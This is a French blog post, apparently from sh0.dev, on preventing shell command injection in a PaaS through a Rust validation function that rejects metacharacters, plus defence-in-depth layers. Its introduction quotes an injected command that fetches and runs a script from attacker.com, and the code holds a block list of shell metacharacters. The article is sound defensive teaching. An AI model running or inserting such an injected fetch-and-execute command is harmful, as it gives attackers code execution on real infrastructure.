Back to sh0
sh0

Prévention de l'injection de commandes dans un PaaS

Un PaaS exécute des commandes fournies par l'utilisateur par conception. Voici comment nous avons construit validate_command() pour empêcher l'injection shell dans les tâches cron, les hooks de déploiement et Docker exec.

Juste A. Gnimavo (Thales) & Claude | March 26, 2026 4 min sh0
EN/ FR/ ES
securitycommand-injectionrustpaasvalidationowasp

Voici le paradoxe fondamental de la construction d'un Platform-as-a-Service : le produit a pour objectif même d'exécuter des commandes fournies par l'utilisateur. Les hooks de déploiement exécutent npm run build. Les tâches cron lancent python cleanup.py. Les sessions Docker exec passent des commandes shell aux conteneurs en cours d'exécution. Vous ne pouvez pas simplement rejeter toute entrée utilisateur qui ressemble à une commande -- les commandes sont le produit.

Mais un PaaS qui exécute des entrées shell arbitraires est à un point-virgule de la catastrophe. npm run build; curl attacker.com/shell.sh | bash ressemble à une commande de build avec un suffixe créatif. C'est en réalité une exécution de code arbitraire sur votre infrastructure.

Cet article couvre comment nous avons construit la prévention d'injection de commandes pour sh0.dev : la fonction validate_command(), les trois surfaces d'attaque qu'elle protège, et les défenses complémentaires qui rendent le système sûr sans le rendre inutilisable.


Les trois surfaces d'attaque

sh0 accepte des commandes fournies par l'utilisateur à trois endroits : les tâches cron (risque le plus élevé -- s'exécutent sans surveillance), les hooks de déploiement (s'exécutent pendant le pipeline), et le Docker exec (terminal web -- défendu par authentification/autorisation plutôt que validation de commande).


La fonction validate_command()

Notre défense est une fonction de validation stricte qui rejette les commandes contenant des métacaractères shell. La fonction s'exécute à la frontière API -- avant que la commande ne soit stockée en base de données.

rustconst FORBIDDEN_CHARS: &[char] = &[';', '|', '&', '`', '>', '<', '\n', '\r'];
const FORBIDDEN_PATTERNS: &[&str] = &["$(", "${"];
const MAX_COMMAND_LENGTH: usize = 4096;

pub fn validate_command(cmd: &str) -> Result<(), ApiError> {
    if cmd.is_empty() {
        return Err(ApiError::BadRequest("La commande ne peut pas être vide".into()));
    }
    if cmd.len() > MAX_COMMAND_LENGTH {
        return Err(ApiError::BadRequest(
            format!("La commande dépasse la longueur maximale de {} caractères", MAX_COMMAND_LENGTH)
        ));
    }
    for ch in FORBIDDEN_CHARS {
        if cmd.contains(*ch) {
            return Err(ApiError::BadRequest(
                format!("La commande contient un caractère interdit : '{}'", ch)
            ));
        }
    }
    for pattern in FORBIDDEN_PATTERNS {
        if cmd.contains(pattern) {
            return Err(ApiError::BadRequest(
                format!("La commande contient un motif interdit : '{}'", pattern)
            ));
        }
    }
    Ok(())
}

La question des faux positifs

L'objection la plus courante au rejet des métacaractères est les faux positifs. « Et si ma tâche cron a légitimement besoin d'un pipe ? » La réponse : écrivez un script. Au lieu de cat log.txt | grep ERROR | wc -l, créez un fichier count_errors.sh dans votre dépôt et définissez la commande cron sur bash /app/count_errors.sh.


La pile de défense en profondeur

CoucheDéfenseProtège contre
1validate_command()Injection de métacaractères shell
2Limite de taille YAML (256 Ko)Bombes YAML / épuisement mémoire
3Rejet des montages de volumesAccès au système de fichiers hôte
4no-new-privilegesEscalade de privilèges dans les conteneurs
5Limites de ressourcesDoS par consommation de ressources
6Application RBACAccès non autorisé
7Journalisation d'auditInvestigation post-incident
8Limitation de débitCréation de commandes par force brute

Leçons apprises

  1. Valider à la frontière, pas à l'exécution. La validation de commande se produit quand l'utilisateur crée la tâche cron.
  2. Le rejet bat l'échappement. L'échappement des métacaractères shell est fragile et spécifique au shell.
  3. Le pattern fichier-script résout le problème d'utilisabilité.
  4. La défense en profondeur n'est pas optionnelle.
  5. Les messages d'erreur sont une fonctionnalité UX de sécurité. Des messages spécifiques transforment un rejet frustrant en moment d'apprentissage.

Cet article fait partie de la série « Comment nous avons construit sh0.dev ».

Share this article:

Responses

Write a response
0/2000
Loading responses...

Related Articles

Thales & Claude deblo

Le jour où Déblo a refusé une bonne réponse — deux fois

Une trace de production a montré Déblo K12 rejetant deux fois de suite la bonne réponse d’un élève de Terminale. Huit heures d’analyse, quatre commits, une rotation A/B de modèles et un benchmark sur 6 modèles plus tard, le tuteur de maths était corrigé. Ce qui a cassé, ce que nous avons changé, et ce que l’échec surprenant de GPT-5.4-mini au test socratique nous a appris sur le choix des modèles pour l’IA éducative.

32 min May 3, 2026
debloclaude-opus-4.7claude-codemethodology +14
Thales & Claude deblo

Web Claude a trouvé le bug. Puis il a failli l’aggraver.

Comment un prompt vocal de 270 lignes pour le tuteur Ultravox de Deblo produisait la même phrase d’accueil scriptu00e9e à chaque appel. Web Claude a diagnostiqué le problème parfaitement, puis a prescrit une correction qui aurait doublé la taille du prompt avec des hooks backend inexistants. Le filtre qui a gardé le diagnostic et rejeté la prescription.

17 min Apr 28, 2026
debloclaude-opus-4.7methodologyprompt-engineering +7
Thales & Claude deblo

Pourquoi j’ai dû corriger Web Claude deux fois sur la stratégie de la page d’accueil de Deblo

Comment une conversation de 48 heures avec Web Claude a failli entraîner Deblo dans le piège généraliste « ChatGPT pour l’Afrique », et pourquoi la connaissance du marché par le fondateur a dû prendre le dessus sur les suggestions stratégiques de l’IA à deux reprises.

26 min Apr 26, 2026
debloclaude-opus-4.7methodologystrategy +6